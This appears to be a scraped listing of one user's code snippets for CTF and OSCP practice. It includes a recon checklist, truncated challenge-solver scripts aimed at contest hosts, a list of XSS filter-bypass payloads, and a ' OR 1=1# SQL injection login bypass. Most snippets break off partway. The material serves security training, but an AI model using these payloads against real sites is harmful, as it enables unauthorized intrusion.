abdilahrf

How to pass the OSCP

1. Recon
2. Find vuln
3. Exploit
4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

abdilahrf

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000

abdilahrf

import requests
import re

url = "http://88.198.233.174:33534/index.php"
payload = {
	"username":"",
	"password":"x",
}

def check(data):

abdilahrf

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>        
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

abdilahrf

import requests
import re

#GLOBAL
base_url = "http://mezzanine.mysterious-hashes.net/"
format_flag = "flag{%s}" 
#LEVEL 1
payload = {
	"user": "' OR 1=1#",
	"pass": "' OR 1=1#"

abdilahrf

#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com 
#

OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'

abdilahrf

Task

You are given a URI (all happens in the http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/ route) that leads to index.php, the same but ends with index.phps and is an alleged source code of the former, finally, index.php contains a link to auth.php

index.phps listing below

<?php
session_start();

$link = @mysql_connect('localhost', '', '');

@mysql_select_db('', $link);

abdilahrf

# coding: utf-8

"""
Unfortunately solved 20 minutes after the end of the CTF :(
"""

import re
import sys
import string
import requests

abdilahrf

from __future__ import division
import hashlib
import requests
from datetime import datetime, timedelta

api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}'

def totimestamp(dt, epoch=datetime(1970,1,1)):
    td = dt - epoch
    return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6

abdilahrf

import requests
from bs4 import BeautifulSoup

url = "https://felicity.iiit.ac.in/contest/extra/fastandfurious/"
soup = BeautifulSoup(requests.get(url).text,"lxml")

headers = {
    'user-agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36",
    'content-type': "application/x-www-form-urlencoded",
    'accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",